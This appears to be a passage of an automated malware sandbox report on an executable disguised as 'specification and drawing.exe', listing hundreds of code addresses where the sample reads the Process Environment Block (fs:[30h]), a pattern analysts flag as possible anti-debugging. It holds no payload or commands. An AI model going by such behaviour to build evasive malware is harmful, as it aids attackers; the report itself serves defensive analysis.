                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010C25E0 mov eax, dword ptr fs:[00000030h]4_2_010C25E0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010F8402 mov eax, dword ptr fs:[00000030h]4_2_010F8402
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010F8402 mov eax, dword ptr fs:[00000030h]4_2_010F8402
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010F8402 mov eax, dword ptr fs:[00000030h]4_2_010F8402
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010BE420 mov eax, dword ptr fs:[00000030h]4_2_010BE420
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010BE420 mov eax, dword ptr fs:[00000030h]4_2_010BE420
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010BE420 mov eax, dword ptr fs:[00000030h]4_2_010BE420
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010BC427 mov eax, dword ptr fs:[00000030h]4_2_010BC427
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01146420 mov eax, dword ptr fs:[00000030h]4_2_01146420
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01146420 mov eax, dword ptr fs:[00000030h]4_2_01146420
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01146420 mov eax, dword ptr fs:[00000030h]4_2_01146420
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01146420 mov eax, dword ptr fs:[00000030h]4_2_01146420
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01146420 mov eax, dword ptr fs:[00000030h]4_2_01146420
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01146420 mov eax, dword ptr fs:[00000030h]4_2_01146420
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01146420 mov eax, dword ptr fs:[00000030h]4_2_01146420
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010FA430 mov eax, dword ptr fs:[00000030h]4_2_010FA430
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010FE443 mov eax, dword ptr fs:[00000030h]4_2_010FE443
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010FE443 mov eax, dword ptr fs:[00000030h]4_2_010FE443
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010FE443 mov eax, dword ptr fs:[00000030h]4_2_010FE443
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010FE443 mov eax, dword ptr fs:[00000030h]4_2_010FE443
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010FE443 mov eax, dword ptr fs:[00000030h]4_2_010FE443
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010FE443 mov eax, dword ptr fs:[00000030h]4_2_010FE443
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010FE443 mov eax, dword ptr fs:[00000030h]4_2_010FE443
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010FE443 mov eax, dword ptr fs:[00000030h]4_2_010FE443
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010E245A mov eax, dword ptr fs:[00000030h]4_2_010E245A
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010B645D mov eax, dword ptr fs:[00000030h]4_2_010B645D
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0114C460 mov ecx, dword ptr fs:[00000030h]4_2_0114C460
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010EA470 mov eax, dword ptr fs:[00000030h]4_2_010EA470
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010EA470 mov eax, dword ptr fs:[00000030h]4_2_010EA470
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010EA470 mov eax, dword ptr fs:[00000030h]4_2_010EA470
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0114A4B0 mov eax, dword ptr fs:[00000030h]4_2_0114A4B0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010C64AB mov eax, dword ptr fs:[00000030h]4_2_010C64AB
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010F44B0 mov ecx, dword ptr fs:[00000030h]4_2_010F44B0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010C04E5 mov ecx, dword ptr fs:[00000030h]4_2_010C04E5
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010FC700 mov eax, dword ptr fs:[00000030h]4_2_010FC700
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010C0710 mov eax, dword ptr fs:[00000030h]4_2_010C0710
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010F0710 mov eax, dword ptr fs:[00000030h]4_2_010F0710
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0113C730 mov eax, dword ptr fs:[00000030h]4_2_0113C730
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010FC720 mov eax, dword ptr fs:[00000030h]4_2_010FC720
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010FC720 mov eax, dword ptr fs:[00000030h]4_2_010FC720
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010F273C mov eax, dword ptr fs:[00000030h]4_2_010F273C
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010F273C mov ecx, dword ptr fs:[00000030h]4_2_010F273C
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010F273C mov eax, dword ptr fs:[00000030h]4_2_010F273C
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01102750 mov eax, dword ptr fs:[00000030h]4_2_01102750
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01102750 mov eax, dword ptr fs:[00000030h]4_2_01102750
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01144755 mov eax, dword ptr fs:[00000030h]4_2_01144755
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010F674D mov esi, dword ptr fs:[00000030h]4_2_010F674D
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010F674D mov eax, dword ptr fs:[00000030h]4_2_010F674D
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010F674D mov eax, dword ptr fs:[00000030h]4_2_010F674D
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0114E75D mov eax, dword ptr fs:[00000030h]4_2_0114E75D
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010C0750 mov eax, dword ptr fs:[00000030h]4_2_010C0750
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010C8770 mov eax, dword ptr fs:[00000030h]4_2_010C8770
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010D0770 mov eax, dword ptr fs:[00000030h]4_2_010D0770
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010D0770 mov eax, dword ptr fs:[00000030h]4_2_010D0770
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010D0770 mov eax, dword ptr fs:[00000030h]4_2_010D0770
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010D0770 mov eax, dword ptr fs:[00000030h]4_2_010D0770
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010D0770 mov eax, dword ptr fs:[00000030h]4_2_010D0770
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010D0770 mov eax, dword ptr fs:[00000030h]4_2_010D0770
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010D0770 mov eax, dword ptr fs:[00000030h]4_2_010D0770
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010D0770 mov eax, dword ptr fs:[00000030h]4_2_010D0770
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010D0770 mov eax, dword ptr fs:[00000030h]4_2_010D0770
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010D0770 mov eax, dword ptr fs:[00000030h]4_2_010D0770
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010D0770 mov eax, dword ptr fs:[00000030h]4_2_010D0770
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010D0770 mov eax, dword ptr fs:[00000030h]4_2_010D0770
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0116678E mov eax, dword ptr fs:[00000030h]4_2_0116678E
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010C07AF mov eax, dword ptr fs:[00000030h]4_2_010C07AF
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010CC7C0 mov eax, dword ptr fs:[00000030h]4_2_010CC7C0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_011407C3 mov eax, dword ptr fs:[00000030h]4_2_011407C3
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010E27ED mov eax, dword ptr fs:[00000030h]4_2_010E27ED
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010E27ED mov eax, dword ptr fs:[00000030h]4_2_010E27ED
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010E27ED mov eax, dword ptr fs:[00000030h]4_2_010E27ED
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0114E7E1 mov eax, dword ptr fs:[00000030h]4_2_0114E7E1
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010C47FB mov eax, dword ptr fs:[00000030h]4_2_010C47FB
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010C47FB mov eax, dword ptr fs:[00000030h]4_2_010C47FB
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010D260B mov eax, dword ptr fs:[00000030h]4_2_010D260B
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010D260B mov eax, dword ptr fs:[00000030h]4_2_010D260B
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010D260B mov eax, dword ptr fs:[00000030h]4_2_010D260B
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010D260B mov eax, dword ptr fs:[00000030h]4_2_010D260B
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010D260B mov eax, dword ptr fs:[00000030h]4_2_010D260B
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010D260B mov eax, dword ptr fs:[00000030h]4_2_010D260B
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010D260B mov eax, dword ptr fs:[00000030h]4_2_010D260B
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01102619 mov eax, dword ptr fs:[00000030h]4_2_01102619
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0113E609 mov eax, dword ptr fs:[00000030h]4_2_0113E609
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010C262C mov eax, dword ptr fs:[00000030h]4_2_010C262C
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010DE627 mov eax, dword ptr fs:[00000030h]4_2_010DE627
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010F6620 mov eax, dword ptr fs:[00000030h]4_2_010F6620
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010F8620 mov eax, dword ptr fs:[00000030h]4_2_010F8620
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010DC640 mov eax, dword ptr fs:[00000030h]4_2_010DC640
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010FA660 mov eax, dword ptr fs:[00000030h]4_2_010FA660
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010FA660 mov eax, dword ptr fs:[00000030h]4_2_010FA660
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0118866E mov eax, dword ptr fs:[00000030h]4_2_0118866E
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0118866E mov eax, dword ptr fs:[00000030h]4_2_0118866E
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010F2674 mov eax, dword ptr fs:[00000030h]4_2_010F2674
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010C4690 mov eax, dword ptr fs:[00000030h]4_2_010C4690
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010C4690 mov eax, dword ptr fs:[00000030h]4_2_010C4690
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010FC6A6 mov eax, dword ptr fs:[00000030h]4_2_010FC6A6
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010F66B0 mov eax, dword ptr fs:[00000030h]4_2_010F66B0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010FA6C7 mov ebx, dword ptr fs:[00000030h]4_2_010FA6C7
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010FA6C7 mov eax, dword ptr fs:[00000030h]4_2_010FA6C7
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0113E6F2 mov eax, dword ptr fs:[00000030h]4_2_0113E6F2
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0113E6F2 mov eax, dword ptr fs:[00000030h]4_2_0113E6F2
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0113E6F2 mov eax, dword ptr fs:[00000030h]4_2_0113E6F2
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0113E6F2 mov eax, dword ptr fs:[00000030h]4_2_0113E6F2
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_011406F1 mov eax, dword ptr fs:[00000030h]4_2_011406F1
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_011406F1 mov eax, dword ptr fs:[00000030h]4_2_011406F1
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0114C912 mov eax, dword ptr fs:[00000030h]4_2_0114C912
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010B8918 mov eax, dword ptr fs:[00000030h]4_2_010B8918
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010B8918 mov eax, dword ptr fs:[00000030h]4_2_010B8918
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0113E908 mov eax, dword ptr fs:[00000030h]4_2_0113E908
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0113E908 mov eax, dword ptr fs:[00000030h]4_2_0113E908
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0114892A mov eax, dword ptr fs:[00000030h]4_2_0114892A
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0115892B mov eax, dword ptr fs:[00000030h]4_2_0115892B
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01140946 mov eax, dword ptr fs:[00000030h]4_2_01140946
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0114C97C mov eax, dword ptr fs:[00000030h]4_2_0114C97C
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010E6962 mov eax, dword ptr fs:[00000030h]4_2_010E6962
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010E6962 mov eax, dword ptr fs:[00000030h]4_2_010E6962
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010E6962 mov eax, dword ptr fs:[00000030h]4_2_010E6962
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01164978 mov eax, dword ptr fs:[00000030h]4_2_01164978
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01164978 mov eax, dword ptr fs:[00000030h]4_2_01164978
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0110096E mov eax, dword ptr fs:[00000030h]4_2_0110096E
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0110096E mov edx, dword ptr fs:[00000030h]4_2_0110096E
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0110096E mov eax, dword ptr fs:[00000030h]4_2_0110096E
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010C09AD mov eax, dword ptr fs:[00000030h]4_2_010C09AD
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010C09AD mov eax, dword ptr fs:[00000030h]4_2_010C09AD
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_011489B3 mov esi, dword ptr fs:[00000030h]4_2_011489B3
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_011489B3 mov eax, dword ptr fs:[00000030h]4_2_011489B3
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_011489B3 mov eax, dword ptr fs:[00000030h]4_2_011489B3
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010D29A0 mov eax, dword ptr fs:[00000030h]4_2_010D29A0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010D29A0 mov eax, dword ptr fs:[00000030h]4_2_010D29A0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010D29A0 mov eax, dword ptr fs:[00000030h]4_2_010D29A0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010D29A0 mov eax, dword ptr fs:[00000030h]4_2_010D29A0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010D29A0 mov eax, dword ptr fs:[00000030h]4_2_010D29A0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010D29A0 mov eax, dword ptr fs:[00000030h]4_2_010D29A0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010D29A0 mov eax, dword ptr fs:[00000030h]4_2_010D29A0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010D29A0 mov eax, dword ptr fs:[00000030h]4_2_010D29A0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010D29A0 mov eax, dword ptr fs:[00000030h]4_2_010D29A0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010D29A0 mov eax, dword ptr fs:[00000030h]4_2_010D29A0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010D29A0 mov eax, dword ptr fs:[00000030h]4_2_010D29A0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010D29A0 mov eax, dword ptr fs:[00000030h]4_2_010D29A0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010D29A0 mov eax, dword ptr fs:[00000030h]4_2_010D29A0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0118A9D3 mov eax, dword ptr fs:[00000030h]4_2_0118A9D3
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_011569C0 mov eax, dword ptr fs:[00000030h]4_2_011569C0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010CA9D0 mov eax, dword ptr fs:[00000030h]4_2_010CA9D0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010CA9D0 mov eax, dword ptr fs:[00000030h]4_2_010CA9D0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010CA9D0 mov eax, dword ptr fs:[00000030h]4_2_010CA9D0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010CA9D0 mov eax, dword ptr fs:[00000030h]4_2_010CA9D0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010CA9D0 mov eax, dword ptr fs:[00000030h]4_2_010CA9D0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010CA9D0 mov eax, dword ptr fs:[00000030h]4_2_010CA9D0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010F49D0 mov eax, dword ptr fs:[00000030h]4_2_010F49D0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0114E9E0 mov eax, dword ptr fs:[00000030h]4_2_0114E9E0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010F29F9 mov eax, dword ptr fs:[00000030h]4_2_010F29F9
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010F29F9 mov eax, dword ptr fs:[00000030h]4_2_010F29F9
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0114C810 mov eax, dword ptr fs:[00000030h]4_2_0114C810
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0116483A mov eax, dword ptr fs:[00000030h]4_2_0116483A
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0116483A mov eax, dword ptr fs:[00000030h]4_2_0116483A
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010E2835 mov eax, dword ptr fs:[00000030h]4_2_010E2835
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010E2835 mov eax, dword ptr fs:[00000030h]4_2_010E2835
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010E2835 mov eax, dword ptr fs:[00000030h]4_2_010E2835
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010E2835 mov ecx, dword ptr fs:[00000030h]4_2_010E2835
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010E2835 mov eax, dword ptr fs:[00000030h]4_2_010E2835
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010E2835 mov eax, dword ptr fs:[00000030h]4_2_010E2835
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010FA830 mov eax, dword ptr fs:[00000030h]4_2_010FA830
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010D2840 mov ecx, dword ptr fs:[00000030h]4_2_010D2840
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010C4859 mov eax, dword ptr fs:[00000030h]4_2_010C4859
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010C4859 mov eax, dword ptr fs:[00000030h]4_2_010C4859
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010F0854 mov eax, dword ptr fs:[00000030h]4_2_010F0854
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01156870 mov eax, dword ptr fs:[00000030h]4_2_01156870
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01156870 mov eax, dword ptr fs:[00000030h]4_2_01156870
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0114E872 mov eax, dword ptr fs:[00000030h]4_2_0114E872
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0114E872 mov eax, dword ptr fs:[00000030h]4_2_0114E872
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0114C89D mov eax, dword ptr fs:[00000030h]4_2_0114C89D
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010C0887 mov eax, dword ptr fs:[00000030h]4_2_010C0887
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010EE8C0 mov eax, dword ptr fs:[00000030h]4_2_010EE8C0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010FC8F9 mov eax, dword ptr fs:[00000030h]4_2_010FC8F9
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010FC8F9 mov eax, dword ptr fs:[00000030h]4_2_010FC8F9
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0118A8E4 mov eax, dword ptr fs:[00000030h]4_2_0118A8E4
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0113EB1D mov eax, dword ptr fs:[00000030h]4_2_0113EB1D
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0113EB1D mov eax, dword ptr fs:[00000030h]4_2_0113EB1D
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0113EB1D mov eax, dword ptr fs:[00000030h]4_2_0113EB1D
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0113EB1D mov eax, dword ptr fs:[00000030h]4_2_0113EB1D
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0113EB1D mov eax, dword ptr fs:[00000030h]4_2_0113EB1D
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0113EB1D mov eax, dword ptr fs:[00000030h]4_2_0113EB1D
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0113EB1D mov eax, dword ptr fs:[00000030h]4_2_0113EB1D
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0113EB1D mov eax, dword ptr fs:[00000030h]4_2_0113EB1D
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0113EB1D mov eax, dword ptr fs:[00000030h]4_2_0113EB1D
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010EEB20 mov eax, dword ptr fs:[00000030h]4_2_010EEB20
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010EEB20 mov eax, dword ptr fs:[00000030h]4_2_010EEB20
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01188B28 mov eax, dword ptr fs:[00000030h]4_2_01188B28
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01188B28 mov eax, dword ptr fs:[00000030h]4_2_01188B28
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01168B42 mov eax, dword ptr fs:[00000030h]4_2_01168B42
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01156B40 mov eax, dword ptr fs:[00000030h]4_2_01156B40
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_01156B40 mov eax, dword ptr fs:[00000030h]4_2_01156B40
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0118AB40 mov eax, dword ptr fs:[00000030h]4_2_0118AB40
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010BCB7E mov eax, dword ptr fs:[00000030h]4_2_010BCB7E
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010D0BBE mov eax, dword ptr fs:[00000030h]4_2_010D0BBE
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010D0BBE mov eax, dword ptr fs:[00000030h]4_2_010D0BBE
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010C0BCD mov eax, dword ptr fs:[00000030h]4_2_010C0BCD
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010C0BCD mov eax, dword ptr fs:[00000030h]4_2_010C0BCD
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010C0BCD mov eax, dword ptr fs:[00000030h]4_2_010C0BCD
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010E0BCB mov eax, dword ptr fs:[00000030h]4_2_010E0BCB
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010E0BCB mov eax, dword ptr fs:[00000030h]4_2_010E0BCB
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010E0BCB mov eax, dword ptr fs:[00000030h]4_2_010E0BCB
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0116EBD0 mov eax, dword ptr fs:[00000030h]4_2_0116EBD0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0114CBF0 mov eax, dword ptr fs:[00000030h]4_2_0114CBF0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010EEBFC mov eax, dword ptr fs:[00000030h]4_2_010EEBFC
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010C8BF0 mov eax, dword ptr fs:[00000030h]4_2_010C8BF0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010C8BF0 mov eax, dword ptr fs:[00000030h]4_2_010C8BF0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010C8BF0 mov eax, dword ptr fs:[00000030h]4_2_010C8BF0
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_0114CA11 mov eax, dword ptr fs:[00000030h]4_2_0114CA11
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010EEA2E mov eax, dword ptr fs:[00000030h]4_2_010EEA2E
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010FCA24 mov eax, dword ptr fs:[00000030h]4_2_010FCA24
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010FCA38 mov eax, dword ptr fs:[00000030h]4_2_010FCA38
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010E4A35 mov eax, dword ptr fs:[00000030h]4_2_010E4A35
                      Source: C:\Users\user\Desktop\specification and drawing.exeCode function: 4_2_010E4A35 mov eax, dword ptr fs:[00000030h]4_2_010E4A35
